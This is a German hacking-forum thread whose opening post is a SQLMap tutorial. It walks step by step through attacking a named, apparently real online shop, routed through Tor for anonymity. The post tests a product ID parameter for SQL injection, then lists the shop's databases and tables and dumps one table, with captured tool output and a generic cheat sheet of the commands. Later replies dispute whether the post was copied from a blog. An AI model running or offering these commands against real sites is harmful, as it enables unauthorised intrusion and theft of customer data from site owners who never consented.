Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 14
  1. #1
    Anfänger Avatar von Mr_NiceGuy
    Registriert seit
    26.01.2016
    Beiträge
    8

    Standard SQL-Injection with SQLMap DE

    Moin moin,

    Ich will euch den einfachen Umgang mit SQLMap beibringen.

    Kommen wir als erstes zu den Voraussetzungen!

    Voraussetzungen:

    Python 2.6 oder 2.7


    Anfang:

    So fangen wir an!

    Wir haben eine URL z.B.
    http://www.wifi-link.com wir suchen uns jetzt ein Artikel aus bei mir ist es: http://www.wifi-link...product_id=2279

    jetzt sehen wir mehrer ID's wenn wir jetzt am Ende einfach ein " ' " anhängen und einen Fehler bekommen wissen wir das diese URL angreifbar ist!


    Start SQLMap:

    Fangen wir mal richtig an

    Wir starten jetzt SQLMap mit der URL wo wir denken das sie angreifbar ist!

    Code:
    python  sqlmap.py --tor --tor-type=SOCKS5 -u  "http://www.wifi-link.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279"
    (Ich starte das ganze mit Tor für die Sicherheit! wenn ihr kein Tor benutzen wollt lasst einfach "--tor --tor-type=SOCKS5" weg! )


    Wenn wir eine Nachricht bekommen das z.B. ID Injectable ist machen wir weiter.

    Code:
    python  sqlmap.py --tor --tor-type=SOCKS5 -u  "http://www.wifi-link.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279"  --dbs
    Damit können wir die einzelnen Tabellen ausgeben das sieht dann so aus:
    Code:
    web server operating system: Linux Fedora
    web application technology: Apache 2.2.9, PHP 5.2.9
    back-end DBMS: MySQL 5.0
    [10:36:20] [INFO] fetching database names
    [10:36:21] [INFO] the SQL query used returns 3 entries
    [10:36:23] [INFO] retrieved: information_schema
    [10:36:24] [INFO] retrieved: WIFI-Link_UK
    [10:36:25] [INFO] retrieved: test
    available databases [3]:[*] information_schema[*] test[*] WIFI-Link_UK
    
    [10:36:25]  [INFO] fetched data logged to text files under  '/home/hagbard-celine/Anwendungen/Injection/sqlmap-dev/output/www.wifi-link.com'
    Jetzt haben wir die Tabellen mit den können wir weiter arbeiten:
    Code:
    python  sqlmap.py --tor --tor-type=SOCKS5 -u  "http://www.wifi-link.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279"  --tables -D test
    Ausgabe:
    Code:
    Database: WIFI-Link_UK
    [50 tables]
    +--------------------+
    | PostAreaMod |
    | PostAssociate |
    | PostMod |
    | VisitRecord |
    | VisitRecordHistory |
    | cable |
    | cable_order |
    | car1 |
    | city |
    | cityarea |
    | class |
    | class_link |
    | contact |
    | country |
    | country_tax |
    | document |
    | epaperorder |
    | form |
    | guestbook |
    | homepage |
    | invoice |
    | invoice_detail |
    | joint |
    | mailerror |
    | manager |
    | marquee |
    | member |
    | mpost |
    | mpost_rule |
    | order_detail |
    | order_list |
    | piorder_detail |
    | piorder_list |
    | post |
    | postage_area |
    | product |
    | product_download |
    | product_link |
    | product_qa |
    | product_suit |
    | product_unit |
    | product_unit_old |
    | product_word |
    | record_people |
    | savemail |
    | ver2_homepage |
    | ver2_info |
    | ver2_language |
    | wifi_config |
    | wifi_present |
    +--------------------+
    Ab jetzt ist nur noch warten angesagt und wie weit ihr schauen wollt!
    Ich liste euch noch ein paar Befehle auf womit ihr die einzelnen Einträge auslesen könnt und die Datenbank auch Dumpen könnt.

    Einzelne Einträge aus einer Tabelle auslesen:

    Code:
    python  sqlmap.py --tor --tor-type=SOCKS5 -u  "http://www.wifi-link.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279"  --columns -D WIFI-Link_UK -T savemail


    Und mit diesem Befehl könnte man das ganze Dumpen:
    Code:
    python  sqlmap.py --tor --tor-type=SOCKS5 -u  "http://www.wifi-link.com/product.php?action=product&class1_id=589&class2_id=927&class3_id=1023&product_id=2279"  --dump -D WIFI-Link_UK -T savemail





    Hier noch mal die Befehle zur Übersicht:
    Code:
    python sqlmap.py -u "http://www.site.com/section.php?id=51"
    Die Datenbanken ausgeben:
    python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
    
    Die Tabellen:
    python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D [database name]
    Die einzelnen Einträge:
    python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D [database name] -T [table]
    Dumpen:
    python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D [database name] -T [table]
    //Edit by sn0w:
    Quelle: http://captn-nemo.blogspot.de/2015/0...injection.html

    Geändert von sn0w (26.01.2016 um 23:15 Uhr) Grund: Quelle hinzugefügt

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Cystasy (26.01.2016), H4x0r007 (26.01.2016), schteal (26.01.2016)

  3. #2
    CIH-Virus Avatar von schteal
    Registriert seit
    10.12.2006
    Beiträge
    426

    Standard AW: SQL-Injection with SQLMap DE

    find ich kurz und knackig gemacht danke dafür


  4. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Mr_NiceGuy (26.01.2016)

  5. #3
    Wiederbelebt Avatar von Cystasy
    Registriert seit
    08.05.2015
    Beiträge
    711

    Standard AW: SQL-Injection with SQLMap DE



    http://captn-nemo.blogspot.de/2015/07/sqlmap-tutorial-sql-injection.html


    Gleiches Spiel auf Toolbase.. Gleicher Nickname, Gleicher Posting Titel, Gleicher Text.. alles copy paste.
    Sowas ist NICHT Sinn des Sache finde ich..
    Geändert von Cystasy (26.01.2016 um 20:25 Uhr)

  6. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    H4x0r007 (26.01.2016), newkaiza (26.01.2016)

  7. #4
    Trojaner
    Registriert seit
    07.04.2015
    Beiträge
    85

    Standard AW: SQL-Injection with SQLMap DE

    Das naechste mal die Quelle hinschreiben. Sonst ist es einfach Lame, wie deine Beitraege in anderen Foren.

  8. #5
    Anfänger Avatar von Mr_NiceGuy
    Registriert seit
    26.01.2016
    Beiträge
    8

    Standard AW: SQL-Injection with SQLMap DE

    Weil ich das bin...
    Also ist das nicht okay das ich meine eigenen Tuts verteile, okay...

  9. #6
    Trojaner
    Registriert seit
    07.04.2015
    Beiträge
    85

    Standard AW: SQL-Injection with SQLMap DE

    Proof?

  10. #7
    Wiederbelebt Avatar von Cystasy
    Registriert seit
    08.05.2015
    Beiträge
    711

    Standard AW: SQL-Injection with SQLMap DE

    Zitat Zitat von Mr_NiceGuy Beitrag anzeigen
    Weil ich das bin...
    Also ist das nicht okay das ich meine eigenen Tuts verteile, okay...

    Naja, bedenke folgendes: der Blog Eintrag wovon es C&P wurde ist sehr alt, und wurde von jemand mit einem anderem Nickname verfasst.
    Zudem bist du frisch registriert, und postest dann plötzlich in 2 verschiedenen Foren genau den gleichen Thread.. wirkt nunmal sehhrr komisch.

    Da fragt man sich halt.. wieso copy pastest du 1:1 dann einen Blogeintrag der ziemlich alt ist, ohne zu erwähnen das es von deinem (?) Blog stammt?
    Ziemlich strange das ganze imho..
    Geändert von Cystasy (26.01.2016 um 23:41 Uhr)

  11. #8
    Anfänger Avatar von Mr_NiceGuy
    Registriert seit
    26.01.2016
    Beiträge
    8

    Standard AW: SQL-Injection with SQLMap DE

    Zitat Zitat von Cystasy Beitrag anzeigen
    Naja, bedenke folgendes: der Blog Eintrag wovon es C&P wurde ist sehr alt, und wurde von jemand mit einem anderem Nickname verfasst.
    Zudem bist du frisch registriert, und postest dann plötzlich in 2 verschiedenen Foren genau den gleichen Thread.. wirkt nunmal sehhrr komisch.

    Da fragt man sich halt.. wieso copy pastest du dann einen Blogeintrag der ziemlich alt ist, ohne zu erwähnen das es von deinem (?) Blog stammt?
    Ziemlich strange das ganze imho..
    Proof?
    Ich kann eben ein neuen Blogeintrag mit eueren Nicks machen?

  12. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Cystasy (26.01.2016)

  13. #9
    Wiederbelebt Avatar von Cystasy
    Registriert seit
    08.05.2015
    Beiträge
    711

    Standard AW: SQL-Injection with SQLMap DE

    Zitat Zitat von Mr_NiceGuy Beitrag anzeigen
    Proof?
    Ich kann eben ein neuen Blogeintrag mit eueren Nicks machen?
    Wäre ne Lösung
    Kannst es danach dann ja wieder entfernen.

    Edit: http://captn-nemo.blogspot.de/2016/01/proof.html passt Tschuldige für die Anschuldigung, aber heutzutage bei sovielen Copy Paste Boys bin ich vorsichtig geworden. Hoffe ist verständlich^^
    Geändert von Cystasy (26.01.2016 um 23:45 Uhr)

  14. #10
    Anfänger Avatar von Mr_NiceGuy
    Registriert seit
    26.01.2016
    Beiträge
    8

    Standard AW: SQL-Injection with SQLMap DE

    Zitat Zitat von Cystasy Beitrag anzeigen
    Wäre ne Lösung
    Kannst es danach dann ja wieder entfernen.
    http://captn-nemo.blogspot.de/2016/01/proof.html

    Kein Problem

  15. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Cystasy (26.01.2016), Zweitopf (27.01.2016)

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •